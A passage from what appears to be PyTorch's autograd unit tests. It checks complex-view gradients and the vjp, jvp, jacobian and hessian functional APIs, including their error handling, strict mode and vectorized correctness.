gradgradcheck_precision_override = gradgradcheck_method_precision_override(test_name)
if gradgradcheck_precision_override is not None:
atol = gradgradcheck_precision_override['atol']
rtol = gradgradcheck_precision_override['rtol']
test_case.assertTrue(gradgradcheck(apply_method, input_variables, None, atol=atol, rtol=rtol,
gen_non_contig_grad_outputs=True,
check_batched_grad=check_batched_grad))
else:
test_case.assertTrue(gradgradcheck(apply_method, input_variables,
gen_non_contig_grad_outputs=True,
check_batched_grad=check_batched_grad))
def run_functional_checks(test_case, test_name, name, apply_fn, run_grad_checks,
f_args_variable, f_args_tensor, *, check_forward_ad=False):
output_variable = apply_fn(*f_args_variable)
if run_grad_checks:
run_grad_and_gradgrad_checks(test_case, name, test_name, apply_fn,
output_variable, f_args_variable, check_forward_ad=check_forward_ad)
self_variable = f_args_variable[0]
if isinstance(output_variable, torch.Tensor) and output_variable.requires_grad and self_variable is not None:
output_variable.backward(torch.randn_like(output_variable))
test_case.assertEqualTypeString(self_variable, self_variable.grad)
test_case.assertEqual(self_variable.size(), self_variable.grad.size())
class TestAutogradComplex(TestCase):
def test_view_func_for_complex_views(self):
# case 1: both parent and child have view_func
x = torch.randn(2, 2, 2, dtype=torch.double, requires_grad=True)
y = x.detach().requires_grad_(True)
x0 = x.clone()
x1 = torch.view_as_complex(x0)
x2 = torch.view_as_real(x1)
x2.mul_(2)
x2.sum().backward()
y0 = y.clone()
y0.mul_(2)
y0.sum().backward()
self.assertEqual(x.grad, y.grad)
# case 2: parent has view_func but child does not
x = torch.randn(2, 2, 2, dtype=torch.double, requires_grad=True)
y = x.detach().requires_grad_(True)
def fn(a):
b = a.clone()
b1 = torch.view_as_complex(b)
b2 = b1.reshape(b1.numel())
return b2
x0 = fn(x)
x0.mul_(2)
x0.sum().backward()
y0 = fn(y)
y1 = y0.mul(2)
y1.sum().backward()
self.assertEqual(x.grad, y.grad)
# case 3: parent does not have a view_func but child does
x = torch.randn(10, dtype=torch.cdouble, requires_grad=True)
y = x.detach().requires_grad_(True)
def fn(a, dim0_size=5):
b = a.clone()
b1 = b.reshape(dim0_size, 2)
b2 = torch.view_as_real(b1)
return b2
x0 = fn(x)
x0.mul_(2)
x0.sum().backward()
y0 = fn(y)
y1 = y0.mul(2)
y1.sum().backward()
self.assertEqual(x.grad, y.grad)
def test_view_with_multi_output(self):
x = torch.randn(2, 2, 2, dtype=torch.double)
x1 = torch.view_as_complex(x)
# Taking an invalid view should always be allowed as long as it is not
# modified inplace
res = x1.unbind(0)
with self.assertRaisesRegex(RuntimeError, "output of a function that returns multiple views"):
res[0] += torch.rand(2, requires_grad=True)
x.requires_grad_(True)
x1 = torch.view_as_complex(x)
# Taking an invalid view should always be allowed as long as it is not
# modified inplace
res = x1.unbind(0)
with self.assertRaisesRegex(RuntimeError, "output of a function that returns multiple views"):
res[0] += torch.rand(2, requires_grad=True)
def as_identity(self):
# view_as_real and view_as_complex behavior should be like an identity
def func(z):
z_ = torch.view_as_complex(z)
z_select = torch.select(z_, z_.dim() - 1, 0)
z_select_real = torch.view_as_real(z_select)
return z_select_real.sum()
z = torch.randn(10, 2, 2, dtype=torch.double, requires_grad=True)
gradcheck(func, [z])
func(z).backward()
z1 = z.clone().detach().requires_grad_(True)
torch.select(z1, z1.dim() - 2, 0).sum().backward()
self.assertEqual(z.grad, z1.grad)
class TestAutogradFunctional(TestCase):
def _assert_same_struct(self, res, base):
# base and res should be Tensors or tuple of Tensors with the same size
if isinstance(base, torch.Tensor):
self.assertTrue(isinstance(res, torch.Tensor))
self.assertEqual(base.size(), res.size())
elif isinstance(base, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(base), len(res))
for el_base, el_res in zip(base, res):
self.assertTrue(isinstance(el_base, torch.Tensor))
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertEqual(el_base.size(), el_res.size())
else:
# Wrong base
raise RuntimeError("The base given to `_assert_same_struct` doesn't have"
" the right structure.")
def _assert_interleaved_struct(self, res, base1, base2):
# base1 and base2 can be Tensors or tuples of Tensors.
# If they are tuples, res should be a tuple as well.
# The indexing works as follows for base1, base2 being
# - tuple, tuple: res[i][j][k][l] = (base1[i][k], base2[j][l])
# - tuple, Tensor: res[i][k][l] = (base1[i][k], base2[l])
# - Tensor, tuple: res[i][j][l] = (base1[i], base2[j][l])
# - Tensor, Tensor: res[k][l] = (base1[k], base2[l])
if isinstance(base1, torch.Tensor) and isinstance(base2, torch.Tensor):
self.assertTrue(isinstance(res, torch.Tensor))
self.assertEqual(res.size(), base1.size() + base2.size())
elif isinstance(base1, tuple) and isinstance(base2, torch.Tensor):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base1))
for el_res, el_base1 in zip(res, base1):
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertTrue(isinstance(el_base1, torch.Tensor))
self.assertEqual(el_res.size(), el_base1.size() + base2.size())
elif isinstance(base1, torch.Tensor) and isinstance(base2, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base2))
for el_res, el_base2 in zip(res, base2):
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertTrue(isinstance(el_base2, torch.Tensor))
self.assertEqual(el_res.size(), base1.size() + el_base2.size())
elif isinstance(base1, tuple) and isinstance(base2, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base1))
for el_res, el_base1 in zip(res, base1):
self.assertTrue(isinstance(el_res, tuple))
self.assertEqual(len(res), len(base2))
for el_el_res, el_base2 in zip(el_res, base2):
self.assertTrue(isinstance(el_el_res, torch.Tensor))
self.assertTrue(isinstance(el_base2, torch.Tensor))
self.assertEqual(el_el_res.size(), el_base1.size() + el_base2.size())
else:
# Wrong bases
raise RuntimeError("The bases given to `_assert_interleaved_struct` don't have"
" the right structure.")
def test_vjp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3)
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
inp = torch.rand(4)
v = torch.ones(3)
with self.assertRaisesRegex(TypeError, "The inputs given to vjp must be either a Tensor"):
res = autogradF.vjp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to vjp must"):
res = autogradF.vjp(bar, inp, v)
with self.assertRaisesRegex(RuntimeError, "The vector v can only be None if the user-provided function returns"):
res = autogradF.vjp(foo, inp)
with self.assertRaisesRegex(RuntimeError, "The given v should contain a single Tensor."):
res = autogradF.vjp(foo, inp, (torch.ones_like(inp), torch.ones_like(inp)))
with self.assertRaisesRegex(RuntimeError, "v has invalid size: should be torch.Size"):
res = autogradF.vjp(foo, inp, v[:2])
res = autogradF.vjp(foo, inp, v)[1]
self._assert_same_struct(res, inp)
def test_vjp_err_check_strict(self):
def foo(a):
return a.detach()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.vjp(foo, inp, v, strict=True)
res = autogradF.vjp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.vjp(bar, inp, v, strict=True)
res = autogradF.vjp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
# The Jacobian does not depend on the input
def foo(a):
return a.clone()
inp.requires_grad_()
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
res = autogradF.vjp(foo, inp, v, create_graph=True, strict=True)
res = autogradF.vjp(foo, inp, v, create_graph=True, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1], v)
def test_vjp_no_grad(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4)
with torch.no_grad():
res = autogradF.vjp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
inputs.requires_grad_()
v.requires_grad_()
with torch.no_grad():
res = autogradF.vjp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_vjp_output(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4)
res = autogradF.vjp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y
inputs = (torch.rand(2), torch.rand(2))
v = torch.ones(2)
out, vjp_val = autogradF.vjp(adder, inputs, v)
self._assert_same_struct(vjp_val, inputs)
self.assertIsNone(out.grad_fn)
self.assertIsNone(vjp_val[0].grad_fn)
self.assertIsNone(vjp_val[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y, x + y
inputs = (torch.rand(2), torch.rand(2))
v = (torch.tensor([1., 0.]), torch.tensor([1., 0.]))
out, vjp_val = autogradF.vjp(adder, inputs, v)
self._assert_same_struct(vjp_val, inputs)
self.assertIsNone(out[0].grad_fn)
self.assertIsNone(out[1].grad_fn)
self.assertIsNone(vjp_val[0].grad_fn)
self.assertIsNone(vjp_val[1].grad_fn)
def test_vjp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones([])
res = autogradF.vjp(reducer, inputs, v)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
res = autogradF.vjp(reducer, inputs)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
v = torch.ones(4)
res = autogradF.vjp(expander, inputs, v)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
def test_vjp_create_graph(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(2, 2, dtype=torch.double)
v = torch.ones(2, dtype=torch.double)
inputs.requires_grad_()
v.requires_grad_()
res = autogradF.vjp(reducer, inputs, v, create_graph=True)
self._assert_same_struct(res[1], inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.vjp(reducer, inputs, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.vjp(reducer, inputs, v, create_graph=True), (inputs, v))
def adder(x, y):
return 2 * x + 3 * y, x * y
inputs = (torch.rand(2, dtype=torch.double, requires_grad=True),
torch.rand(2, dtype=torch.double, requires_grad=True))
v = (torch.tensor([1., 0.], dtype=torch.double, requires_grad=True),
torch.tensor([1., 0.], dtype=torch.double, requires_grad=True))
gradcheck(lambda *args: autogradF.vjp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.vjp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.vjp(adder, (x, y), v, create_graph=True)
return val[0].exp() + val[1].exp() + grad[0].exp() + grad[1].exp() + x.exp() + y.exp()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def test_jvp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3)
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to jvp must be either a Tensor"):
res = autogradF.jvp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to jvp must"):
res = autogradF.jvp(bar, inp, v)
with self.assertRaisesRegex(RuntimeError, "The vector v can only be None if the input to the user-provided function"):
res = autogradF.jvp(foo, inp)
with self.assertRaisesRegex(RuntimeError, "The given v should contain a single Tensor."):
res = autogradF.jvp(foo, inp, (v, v))
with self.assertRaisesRegex(RuntimeError, "v has invalid size: should be torch.Size"):
res = autogradF.jvp(foo, inp, v[:2])
res = autogradF.jvp(foo, inp, v)[1]
self._assert_same_struct(res, foo(inp))
def test_jvp_err_check_strict(self):
def foo(a):
return a.detach()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.jvp(foo, inp, v, strict=True)
res = autogradF.jvp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], res[0])
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.jvp(bar, inp, v, strict=True)
res = autogradF.jvp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], res[0])
self.assertEqual(res[1].abs().sum(), 0.)
# The Jacobian does not depend on the input
def foo(a):
return a.clone()
inp.requires_grad_()
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
res = autogradF.jvp(foo, inp, v, create_graph=True, strict=True)
res = autogradF.jvp(foo, inp, v, create_graph=True, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1], v)
def test_jvp_no_grad(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.jvp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
inputs.requires_grad_()
v.requires_grad_()
with torch.no_grad():
res = autogradF.jvp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_jvp_output(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.jvp(reducer, inputs, v)
self._assert_same_struct(res[1], res[0])
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y
inputs = (torch.rand(2), torch.rand(2))
v = (torch.ones(2), torch.ones(2))
out, jvp_val = autogradF.jvp(adder, inputs, v)
self._assert_same_struct(jvp_val, out)
self.assertIsNone(out.grad_fn)
self.assertIsNone(jvp_val[0].grad_fn)
self.assertIsNone(jvp_val[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y, x + y
inputs = (torch.rand(2), torch.rand(2))
v = (torch.tensor([1., 0.]), torch.tensor([1., 0.]))
out, jvp_val = autogradF.jvp(adder, inputs, v)
self._assert_same_struct(jvp_val, out)
self.assertIsNone(out[0].grad_fn)
self.assertIsNone(out[1].grad_fn)
self.assertIsNone(jvp_val[0].grad_fn)
self.assertIsNone(jvp_val[1].grad_fn)
def test_jvp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.jvp(reducer, inputs, v)
self._assert_same_struct(res[0], torch.zeros([]))
self._assert_same_struct(res[1], res[0])
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
v = torch.ones([])
res = autogradF.jvp(expander, inputs, v)
self._assert_same_struct(res[0], torch.zeros(4))
self._assert_same_struct(res[1], res[0])
res = autogradF.jvp(expander, inputs)
self._assert_same_struct(res[0], torch.zeros(4))
self._assert_same_struct(res[1], res[0])
def test_jvp_create_graph(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(2, 2, dtype=torch.double)
v = torch.ones(2, 2, dtype=torch.double)
inputs.requires_grad_()
v.requires_grad_()
res = autogradF.jvp(reducer, inputs, v, create_graph=True)
self._assert_same_struct(res[1], res[0])
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.jvp(reducer, inp, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.jvp(reducer, inp, v, create_graph=True), (inputs, v))
def adder(x, y):
return 2 * x + 3 * y, x * y
inputs = (torch.rand(2, dtype=torch.double, requires_grad=True),
torch.rand(2, dtype=torch.double, requires_grad=True))
v = (torch.tensor([1., 0.], dtype=torch.double, requires_grad=True),
torch.tensor([1., 0.], dtype=torch.double, requires_grad=True))
gradcheck(lambda *args: autogradF.jvp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.jvp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.jvp(adder, (x, y), v, create_graph=True)
return val[0].exp() + val[1].exp() + grad[0].exp() + grad[1].exp() + x.exp() + y.exp()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def _test_construct_standard_basis_for(self, inputs):
numels = tuple(tensor.numel() for tensor in inputs)
results = autogradF._construct_standard_basis_for(inputs, numels)
for result, inp in zip(results, inputs):
self.assertEqual(result.dtype, inp.dtype)
self.assertEqual(result.device, inp.device)
results = torch.cat([result.to(device='cpu', dtype=torch.float)
for result in results], dim=1)
expected = torch.eye(results[0].shape[0], dtype=torch.float)
self.assertEqual(results, expected)
def test_construct_standard_basis_for(self):
test_cases = [
(torch.randn(2, 3),),
(torch.randn(1),),
(torch.randn([]),),
(torch.randn(1), torch.randn([]), torch.randn([])),
(torch.randn(2), torch.randn(3), torch.randn([])),
(torch.randn(2), torch.randn([]), torch.randn(3)),
(torch.randn(2, 3), torch.randn(3), torch.randn(3, 4, 2)),
(torch.randn(2, dtype=torch.float64), torch.randn(3, dtype=torch.float32)),
]
for inputs in test_cases:
self._test_construct_standard_basis_for(inputs)
@unittest.skipIf(not TEST_CUDA, "test requires CUDA")
def test_construct_standard_basis_for_cuda(self):
test_cases = [
(torch.randn(2), torch.randn(3, device='cuda')),
(torch.randn(3, device='cuda'), torch.randn(2)),
]
for inputs in test_cases:
self._test_construct_standard_basis_for(inputs)
def _test_vectorize_raises_no_warnings(self, api):
# vmap is an experimental prototype. When someone calls torch.vmap,
# it raises a python warning. This test checks that
# autogradF.{jacobian, hessian} don't raise that experimental prototype
# warning; it is not nice for a public-facing API to raise a warning
# no matter how it is called.
def foo(a):
return (a ** 2).sum()
x = torch.randn(3)
with warnings.catch_warnings(record=True) as wa:
result = api(foo, x, vectorize=True)
self.assertEqual(len(wa), 0)
def test_jacobian_vectorize_raises_no_warnings(self):
return self._test_vectorize_raises_no_warnings(autogradF.jacobian)
def test_hessian_vectorize_raises_no_warnings(self):
return self._test_vectorize_raises_no_warnings(autogradF.hessian)
def _test_jacobian_err_check(self, vectorize):
def foo(a):
return 3 * a.narrow(0, 0, 3)
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
inp = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to jacobian must be either a Tensor"):
res = autogradF.jacobian(foo, (inp, 2), vectorize=vectorize)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to jacobian must"):
res = autogradF.jacobian(bar, inp, vectorize=vectorize)
res = autogradF.jacobian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, foo(inp), inp)
def foo(a, b):
return b, 3 * a.narrow(0, 0, 3)
inp = (torch.rand(4), torch.rand(5))
res = autogradF.jacobian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, foo(*inp), inp)
def test_jacobian_err_check(self):
return self._test_jacobian_err_check(vectorize=False)
def test_jacobian_err_check_vectorize(self):
return self._test_jacobian_err_check(vectorize=True)
def test_jacobian_err_check_strict(self):
def foo(a):
return a.detach()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.jacobian(foo, inp, strict=True)
res = autogradF.jacobian(foo, inp, strict=False)
self._assert_interleaved_struct(res, foo(inp), inp)
self.assertEqual(res.abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function is independent of input 0."):
res = autogradF.jacobian(bar, inp, strict=True)
res = autogradF.jacobian(bar, inp, strict=False)
self._assert_interleaved_struct(res, foo(inp), inp)
self.assertEqual(res.abs().sum(), 0.)
# The Jacobian does not depend on the input
def foo(a):
return a.clone()
inp.requires_grad_()
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
res = autogradF.jacobian(foo, inp, create_graph=True, strict=True)
res = autogradF.jacobian(foo, inp, create_graph=True, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res, torch.eye(4))
def test_jacobian_err_check_strict_vectorize(self):
def foo(x):
return x
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "not supported together"):
res = autogradF.jacobian(foo, inp, strict=True, vectorize=True)
def test_jacobian_no_grad(self):
def exp_reducer(x):
return x.exp().sum(dim=1)
inputs = torch.rand(4, 4)
with torch.no_grad():
res = autogradF.jacobian(exp_reducer, inputs)
self.assertIsNone(res.grad_fn)
self.assertNotEqual(res, torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.jacobian(exp_reducer, inputs, create_graph=True)
self.assertIsNotNone(res.grad_fn)
self.assertNotEqual(res, torch.zeros(4, 4))
def _test_jacobian_output(self, vectorize):
def exp_reducer(x):
return x.exp().sum(dim=1)
inputs = torch.rand(4, 4)
res = autogradF.jacobian(exp_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, exp_reducer(inputs), inputs)
self.assertIsNone(res.grad_fn)
def identity(x):
return x.clone()
inputs = torch.rand(4)
res = autogradF.jacobian(identity, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, identity(inputs), inputs)
self.assertIsNone(res.grad_fn)
self.assertEqual(res, torch.eye(4))
def add_exp_reducer(x, y):
return (x + y.exp()).sum(dim=1)
inputs = (torch.rand(4, 4), torch.rand(4, 4))
res = autogradF.jacobian(add_exp_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, add_exp_reducer(*inputs), inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def test_jacobian_output(self):
self._test_jacobian_output(vectorize=False)
def test_jacobian_output_vectorize(self):
self._test_jacobian_output(vectorize=True)
def _test_jacobian_scalar(self, vectorize):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
res = autogradF.jacobian(reducer, inputs, vectorize=vectorize)
self._assert_same_struct(res, inputs)
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
res = autogradF.jacobian(expander, inputs, vectorize=vectorize)
self._assert_same_struct(res, torch.zeros(4))
def test_jacobian_scalar(self):
self._test_jacobian_scalar(vectorize=False)
def test_jacobian_scalar_vectorize(self):
self._test_jacobian_scalar(vectorize=True)
def _test_jacobian_create_graph(self, vectorize):
def exp_reducer(x):
return x.exp().sum(dim=1)
inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
res = autogradF.jacobian(exp_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, exp_reducer(inputs), inputs)
self.assertIsNotNone(res.grad_fn)
gradcheck(lambda inp: autogradF.jacobian(exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
gradgradcheck(lambda inp: autogradF.jacobian(exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
def add_exp_reducer(x, y):
return (x + y).exp().sum(dim=1)
inputs = (torch.rand(4, 4, dtype=torch.double, requires_grad=True),
torch.rand(4, 4, dtype=torch.double, requires_grad=True))
res = autogradF.jacobian(add_exp_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, add_exp_reducer(*inputs), inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda *inp: autogradF.jacobian(add_exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
gradgradcheck(lambda *inp: autogradF.jacobian(add_exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
def foo(x, y):
x = x.cos()
val, jac = autogradF.jacobian(add_exp_reducer, (x, y), create_graph=True, vectorize=vectorize)
res = val[0].exp().sum() + val[1].exp().sum() + jac[0].exp().sum()
res = res + jac[1].exp().sum() + x.exp().sum() + y.exp().sum()
return res
gradcheck(foo, inputs)
gradgradcheck(foo, inputs)
def test_jacobian_create_graph(self):
self._test_jacobian_create_graph(vectorize=False)
def test_jacobian_create_graph_vectorize(self):
self._test_jacobian_create_graph(vectorize=True)
def _check_jacobian_vectorize_correctness(self, f, inputs):
expected = autogradF.jacobian(f, inputs, vectorize=False)
result = autogradF.jacobian(f, inputs, vectorize=True)
self.assertEqual(result, expected)
def test_jacobian_vectorize_correctness_simple(self):
def f(x):
return 3 * x ** 2
x = torch.randn(2, 3, 5)
self._check_jacobian_vectorize_correctness(f, x)
def test_jacobian_vectorize_correctness_multi_input(self):
def f(x, y):
return (x.cos() * x) @ y.sin()
x = torch.randn(2, 3)
y = torch.randn(3, 5)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_multi_input_multi_output(self):
def f(x, y):
return (x * x) @ y, x @ (x.sum(1) * y), y.sum()
x = torch.randn(5, 3)
y = torch.randn(3, 5)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_unrelated_outputs(self):
def f(x, y):
return x, y, x, y
x = torch.randn(2)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_zero_dim(self):
# zero-dim output
def f(x, y):
return x.sum(), y.sum(), x * y
x = torch.randn(3)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
# zero-dim input
def g(x):
return torch.stack([x, x, x])
x = torch.randn([])
self._check_jacobian_vectorize_correctness(g, x)
# Mixed zero-dim input / zero-dim output
def h(x, y):
return y.sum(), x * y
x = torch.randn([])
y = torch.randn(1)
self._check_jacobian_vectorize_correctness(h, (x, y))
@unittest.skipIf(not TEST_CUDA, "test requires CUDA")
def test_jacobian_vectorize_correctness_different_devices(self):
def f(x, y):
return x * y, (x * y).cuda()
x = torch.randn(3)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_different_dtype(self):
def f(x, y):
return (x * y).float(), (x * y).double()
x = torch.randn(3)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
def _check_hessian_vectorize_correctness(self, f, inputs):
expected = autogradF.hessian(f, inputs, vectorize=False)
result = autogradF.hessian(f, inputs, vectorize=True)
self.assertEqual(result, expected)
def test_hessian_vectorize_correctness_simple(self):
def f(x):
return (3 * x ** 2).sum()
x = torch.randn(2, 3, 5)
self._check_hessian_vectorize_correctness(f, x)
def test_hessian_vectorize_correctness_multi_input(self):
def f(x, y, z):
return ((x.relu() * x) @ y.sin() @ z).sum()
x = torch.randn(2, 3)
y = torch.randn(3, 5)
z = torch.randn(5, 5)
self._check_hessian_vectorize_correctness(f, (x, y, z))
def test_hessian_vectorize_correctness_unrelated_outputs(self):
# output unrelated to one input
def f(x, y):
return (x ** 2).sum()
x = torch.randn(2)
y = torch.randn(3)
self._check_hessian_vectorize_correctness(f, (x, y))
# output unrelated to all inputs
def f(x, y):
return torch.randn([])
x = torch.randn(2)
y = torch.randn(3)
self._check_hessian_vectorize_correctness(f, (x, y))
def _test_hessian_err_check(self, vectorize):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
def bar2(a):
return 3 * a.narrow(0, 0, 3)
def bar3(a):
return 3 * a.narrow(0, 0, 3), 3 * a.narrow(0, 0, 3)
inp = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to hessian must be either a Tensor"):
res = autogradF.hessian(foo, (inp, 2), vectorize=vectorize)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to hessian must"):
res = autogradF.hessian(bar, inp, vectorize=vectorize)
err_msg_out = "The Tensor returned by the function given to hessian should contain a single element"
with self.assertRaisesRegex(RuntimeError, err_msg_out):
res = autogradF.hessian(bar2, inp, vectorize=vectorize)
with self.assertRaisesRegex(RuntimeError, "The function given to hessian should return a single Tensor"):
res = autogradF.hessian(bar3, inp, vectorize=vectorize)
res = autogradF.hessian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, inp, inp)
def foo(a, b):
return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
inp = (torch.rand(4), torch.rand(5))
res = autogradF.hessian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, inp, inp)
def test_hessian_err_check(self):
self._test_hessian_err_check(vectorize=False)
def test_hessian_err_check_vectorize(self):
self._test_hessian_err_check(vectorize=True)
def test_hessian_err_check_strict(self):
def foo(a):
return a.detach().sum()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone().sum()
def bar2(a):
# A Linear function for which the jacobian is independent of the input
return (3 * a).sum()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.hessian(foo, inp, strict=True)
res = autogradF.hessian(foo, inp, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res.abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0"):
res = autogradF.hessian(bar, inp, strict=True)
res = autogradF.hessian(bar, inp, strict=False)
self._assert_interleaved_struct(res, inp, inp)
